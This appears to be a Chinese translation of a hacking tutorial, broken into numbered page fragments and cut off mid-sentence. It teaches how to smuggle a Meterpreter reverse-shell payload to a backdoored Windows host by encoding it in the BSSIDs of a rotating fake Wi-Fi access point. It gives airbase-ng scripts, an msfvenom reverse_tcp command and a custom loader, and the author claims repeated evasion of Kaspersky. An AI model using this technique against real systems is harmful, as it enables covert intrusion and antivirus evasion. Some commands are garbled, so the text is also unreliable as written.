通过无线流量的bssid传输后门payload 作者 erfze_W

1、通过无线流量的BSSID传输后门Payload作者： ERFZE原文链接：/s/HAltyHDuPrG0qawHS3hZGw本文由 干货 收集整理：/test/index.php0x00 前言在这篇文章中我想讨论无线接入点(Wireless Access Point)以及利用BSSID(MAC-Address AP)传输Payload。 我们之前讨论过IPv4下利用ARP流量传输Payload，现在我们谈论谈论无线流量中与其相类似的内容。该技术类似于之前 文章 中的利用ARP流量传输Payload的技术。 0x0

2、1 About这一次我们依然没有加密后门Payload，同样没有使用文件系统(仅内存)中的硬编码Payload，但还是能够通过这种方法绕过杀软。这种方法也适用于通过无线流量传输未加密 Meterpreter Payload。 这种情形下，攻击者可以通过改变伪AP的BSSID(循环修改)来达到攻击目的。这意味着你只需修改BSSID，将后门Payload逐步注入到BSSID中，然后受感染的客户端(即注入后门的系 统)就会在不用验证以连接到伪AP、仅仅是扫描周围AP的MAC-Address(BSSID)情形下转储这些Payload。Payload传输发生在无线设备之间，比如：Wlan环境中。 在我的

3、方案中，受害者通过扫描周围AP的BSSID转储完Payload之后，Meterpreter会话建立于以太网(并非无线网络环境)之上。 你将能够看到，恶意代码或者本文中提到的简单后门会默默地在无线设备之间传输，最终你可以使用一段简单的C#代码获得Meterpreter会话。 在我的方案中，我使用无线网络仅是传输Payload(Step 1)，受害者通过扫描无线设备的MAC-Address(BSSID)转储Payload；之后我植入的后门会使用eth0或者以太网卡来建立Meterpreter会话(Step 2)，我们将不使用无线网络来建立会话。 Note:我认为Step 1与Step 2都在无线网

4、络环境中完成在技术实现上是可能的，但我无法给出确切答案，因为我并没有进行测试。不过我觉得是可能实现的，在(Step 2)中你需要EvilTwin AP，同时 Meterpreter Listener 需要使用热点子网中的某个IP地址 20 Note:你可以使用 MANA-Toolkit 或者与它类似的工具来实现EvilTwin AP。链接： /sensepost/mana 0x02 本方法的重点重点就是：将恶意代码或者后门Payload注入到无线设备的BSSID中，并通过无线流量传输是可能实现的。 0x03 一步步地教你将Payloads注入到伪AP的BSSI

5、Ds中我们以下面这段Payload作为示例： fec8b00011ddc00945f1Step 1:攻击者建立一个伪AP，名为 Fake，MAC地址是 00:fe:c8:b0:00:11。 Note:MAC地址 00:fe:c8:b0:00:11fec8b00011ddc00945f1 就是我们要注入的Payload，是的前半部分。 Step 2:植入后门的系统扫描到ESSID为Fake的AP，并转储其BSSID。 fec8b00011Note:你的后门代码处理BSSID时需去掉:之后再进行转储，即: fe:c8:b0:00:11=Step 3:攻击者再次建立一个伪AP，名称不变，MAC地址改

6、为 00:dd:c0:09:45:f1。 fec8b00011ddc00945f1Step 4:植入后门的系统扫描到ESSID为Fake的AP，并转储其BSSID。 经过 Step 2与 Step 4两个步骤后，植入后门系统将会被注入Payload。 0x04 使用命令实现上述步骤0x04.1 命令实现Step 1现在，你应该已经理解了这种方法的工作原理，下面让我将展示如何在Linux下使用命令实现 与 Step 3 (即通过命令建立伪AP)。 可选命令：在创建Wlan0mon之前使用下面的命令可以改变你无线网卡的TXPower，这样做会增强你的伪AP的信号。如果你愿意的话，请手动输入： if

7、config wlan0 down iw reg set BO ifconfig wlan0 upiwconfig wlan0 txpower 30 aimon-ngNote:这些命令一定要在通过建立Wlan0mon之前使用，当然，它们是可选命令(并非必需)。 script1.sh将无线网卡更改为 模式是非常重要的一步：airmon-ng start wlan0 。执行此命令之后你会看到多了一块Wlan0Mon网卡(处于模式)。 Note:你可以手动输入此命令并运行，仅使用一次即可。或者你可以在 脚本中使用一次此命令。我是在攻击者主机上手动输入此命令并运行的。 Step 1:攻击者建立一个伪A

8、P，名为 Fake，MAC地址是 00:fe:c8:b0:00:11。 00:fe:c8:b0:00:11Note:MAC地址是我们要注入的Payload，我们的Payload是fec8b00011。 airmon-ng start wlan0cmd 1-1:airbase-ng -a 00:fe:c8:b0:00:11 essid “Fake” -I 10 -0 wlan0moncmd 1-2:killallNote:你需要使伪AP的信号持续15秒，所以15秒之后可以使用命令杀死该进程。 sleep 15cmd 1-3:killall airbase-ngcmd 1-4:airbase-ng

9、 -a 00:00:dd:c0:09:45:f1 essid “Fake” -I 10 -0 wlan0monStep 3:攻击者建立一个伪AP，名为 Fake cmd 3-1:，MAC地址是 00:dd:c0:09:45:f1。 sleep 15cmd 3-2:killall airbase-ngcmd 3-3:airbase-ng正如你看到的那样，实现这些步骤我们需要使用这些命令，但我们在使用时存在问题。或者可能是我在使用这个命令时存在问题。 0x04.2 问题何在？airbase-ng问题出现在 cmd 1-2 与 cmd 1-3 之间，在执行了 cmd 1-2 之后你无法让命令时停止，

10、除非我杀死该进程。 0x05 编写脚本所以为了解决这个问题，我使用了两个脚本来实现这些步骤： 第一个脚本文件Script1.sh用于实现 cmd 1-2 与 cmd 3-1 ； 命令停下来，你只能使用Ctrl+C或者终止该命令所以我的脚本总会在执行到 cmd 1-2 这一 Note:你可以将 cmd 1-1 加入到这个脚本的第一行或者是手动输入运行。我选择了手动输入运行一次。 第二个脚本文件Script2.sh用于实现 cmd 1-3 、 cmd 1-4 、 cmd 3-2 与 cmd 3-3 。 所以在我的方案实现中我们首先需要运行Script1.sh然后立即或者2-3秒之后运行Script

11、2.sh。两个脚本文件内容如下： Script1.sh#!/bin/bashairbase-ng -a 00:fe:c8:b0:00:11 essid “Fake” -I 10 -0 wlan0mon ; airbase-ng -a 00:dd:c0:09:45:f1 essid “Fake” -I 10 -0 wlan0mon ;Script2.sh#!/bin/bash sleep 15 ;killall airbase-ng ; sleep 15 ;killall airbase-ng ;Note:你可以在Script2.sh脚本中使用循环语句(比如for)。 Meterpreter P

12、ayload从下图中你可以看到，我们使用Script1.sh将注入到BSSIDs中。 Meterpreter Payload 开始于第三行。我的 Meterpreter Payload大小为510Bytes。通过 airbase-ng 命令我们一次可以注入5Bytes到伪APFake的BSSID中。所 以我们需要102行代码来通过 airbase-ng 命令注入所有的Payload到BSSID中。(102*5=510 Bytes)Note:每个BSSID包含5字节Payload。BSSID=00:fc:48:83:e4:f0，5 bytes = fc-48-83-e4-f0。 我们需要额外加入

13、两个MAC地址到Script1.sh中。上图脚本中的第二行MAC地址是00:ff:ff:ff:ff:ff，这个MAC地址或者说BSSID作为开始攻击流量传输入侵受害者主机的标志。下图脚本中 可以看到作为结束标志的BSSID00:ff:00:ff:00:ff。 BSSID Flag for Start = 00:ff:ff:ff:ff:ff BSSID Flag for Finish = 00:ff:00:ff:00:ff循环注入Payload到BSSID中，即BSSID改变次数共(102+2)=104次。 下面图片是Script2.sh脚本文件内容，你同样可以使用循环(比如for)来实现与其相

14、同的效果。 在Script2.sh中，你至少要杀死 airbase-ng104次。 0x06 使用NativePayload_BSSID.exe现在我想通过我的工具 NativePayload_BSSID.exeStep 0：将无线网卡设为模式。 来一步一步地为你解释这个方法。 命令： airmon-ng start wlan0 msfvenom -a x86_64 -platform windows -p windows/x64/meterpreter/reverse_tcp lhost=0 -f c payload.txtStep 1：你可以使用下面的命令为你的后门创

15、建一个Payload。 Step 2：在这一步中，你应当先将 payload.txt文件中的Payload由xfcx48x83xe4转换为fc4883e4的形式。 你可以通过这个工具的 help选项来显示所有的使用语法，如下图所示： 现在你应该使用 NULL 并将Payload字符串复制粘贴到其后，如下图所示： 命令： c: NativePayload.exe null “fc4883e4.”然后你应当将上面所有的 airbase-ng命令复制到一个脚本文件中（比如：script1.sh），该情形下一共有102+2=104行。另外，你需要在这个脚本文件中的第一行添加 #!/bin/bash，现

16、在这个文件应该有105行。 Step 3：这一步中你需要在Linux中运行这一脚本文件。不必担心，可以的！ 如图所示， chmod修改脚本文件的权限，然后运行这一脚本： Step 4：这一步中你应当创建 script2.sh，并用 chmod修改脚本文件的权限，但是不要运行。 Note:你需要像 0x05最后一张图片中那样手动建立 script2.sh。 Step 5：现在你应当运行后门程序(此例中为 NativePayload_BSSID.exe)。从下图中可以看到，我在Kali Linux中为IP地址0建立了Meterpreter Listener。 在 Step 5

17、步骤中我们共需要执行4小步： Step AA：执行Meterpreter Listener(Linux);Step BB：运行 script1.sh(Linux);Step CC：执行后门程序 NativePayload_BSSID.exe(Windows);Step DD：运行 script2.sh(Linux);NativePayload_BSSID.exe在Step CC中你应当使用 NativePayload_BSSID.exe “essid” 命令执行 NativePayload_BSSID.exe “Fake” 。如下图，StepAA、BB、CC得以执行： ，此例中我们的ESSID

18、为“Fake”，所以正确命令应该为 script2.sh正如你从图中看到的一样，后门程序被名为u1的用户执行(此例中)，之后你应当运行(Step DD)。 这时后门程序尝试扫描周围ESSID为Fake的AP，之后转储其BSSID。所以你可以在上图中看到我的代码转储了4次BSSID即00:ff:ff:ff:ff:ff，这是开始攻击以及通过BSSID传输Payloads 的标志。 所以 在流量传输过程中 ，有以下这些步骤： 现在是时候运行 script2.sh (Step DD)了。 运行 script2.sh 脚本之后，每15秒这个脚本就会杀死你 script1.sh 文件中的一个Airbase

19、-ng命令。 所以运行 script2.sh 脚本之后， 在流量传输过程中 ，有了以下这些步骤： script2.sh正如你从下图中看到的那样，我的后门程序在运行 脚本之后尝试转储BSSIDs： 下图中可以看出，在30分钟之后，建立了Meterpreter会话： 我们通过我用C#编写的程序成功建立了Meterpreter会话，并且使用这种方法一次又一次地绕过了卡巴斯基2017。 System.Threading.Thread.Sleep(15000);Note：在上图中你可以看到，我的程序是在15秒之后建立了Meterpreter会话，这个延迟是我在代码(代码对此方法进行验证，你应该在转储完所

20、有Payload之后等待15秒，不出意外的话会建立Meterpreter会话。 )中设置的。如果你使用我的 0x07 总结你的无线设备总是漏洞 ，所以你应当考虑这些威胁： 1. 将恶意代码或者Payload注入到BSSID中，并通过无线流量传输;2. 如果你想在你的客户端或者网络基础设施上使用无线设备，你应当考虑这些威胁;3. 在这种方法中，受害者主机总是脆弱的，可能某一天你的主机会被攻击者的手机或者伪AP攻击;4. 此例中，我的后门程序尝试扫描ESSID为Fake的无线设备，并转储其BSSID。所以，流量传输很慢，不易被察觉。 5. 你的防病毒软件并不能检测到这种方法，同时也能绕过LAN/WAN中的 ，因为我们的流量传输时并没有经过这些设备。此例中，流量是直接在受害者主机与攻击者主机的无 线网卡间传输。后门程序在转储完Payloads之后，受害者主机与攻击者主机间的Meterpreter会话流量是通过LAN/WAN而非无线网卡，所以我们再一次在植入后门主机与攻击者主